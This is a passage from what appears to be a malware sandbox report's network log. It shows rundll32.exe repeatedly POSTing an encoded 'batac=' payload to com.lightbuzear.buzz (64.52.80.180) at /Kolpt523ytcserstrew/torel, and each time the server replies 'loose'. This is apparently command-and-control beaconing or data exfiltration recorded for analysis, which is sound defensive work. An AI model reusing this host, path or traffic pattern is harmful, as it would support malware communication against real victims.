              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:11 UTC70INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:11 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:11 UTC70INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              42192.168.2.224921464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:11 UTC70OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:11 UTC71OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:12 UTC72INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:12 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:12 UTC72INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              43192.168.2.224921564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:12 UTC72OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:12 UTC72OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:13 UTC73INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:13 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:13 UTC74INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              44192.168.2.224921664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:13 UTC74OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:13 UTC74OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:14 UTC75INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:14 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:14 UTC75INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              45192.168.2.224921764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:14 UTC75OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:14 UTC76OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:15 UTC77INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:15 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:15 UTC77INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              46192.168.2.224921864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:16 UTC77OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:16 UTC77OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:16 UTC78INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:16 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:16 UTC79INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              47192.168.2.224921964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:17 UTC79OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:17 UTC79OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:17 UTC80INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:17 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:17 UTC80INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              48192.168.2.224922064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:18 UTC80OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:18 UTC81OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:18 UTC82INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:18 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:18 UTC82INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              49192.168.2.224922164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:19 UTC82OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:19 UTC82OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:19 UTC83INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:19 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:19 UTC84INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              5192.168.2.224917764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:31 UTC9OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:31 UTC10OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:31 UTC11INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:31 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:31 UTC11INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              50192.168.2.224922264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:20 UTC84OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:20 UTC84OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:20 UTC85INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:20 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:20 UTC85INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              51192.168.2.224922364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:21 UTC85OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:21 UTC86OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
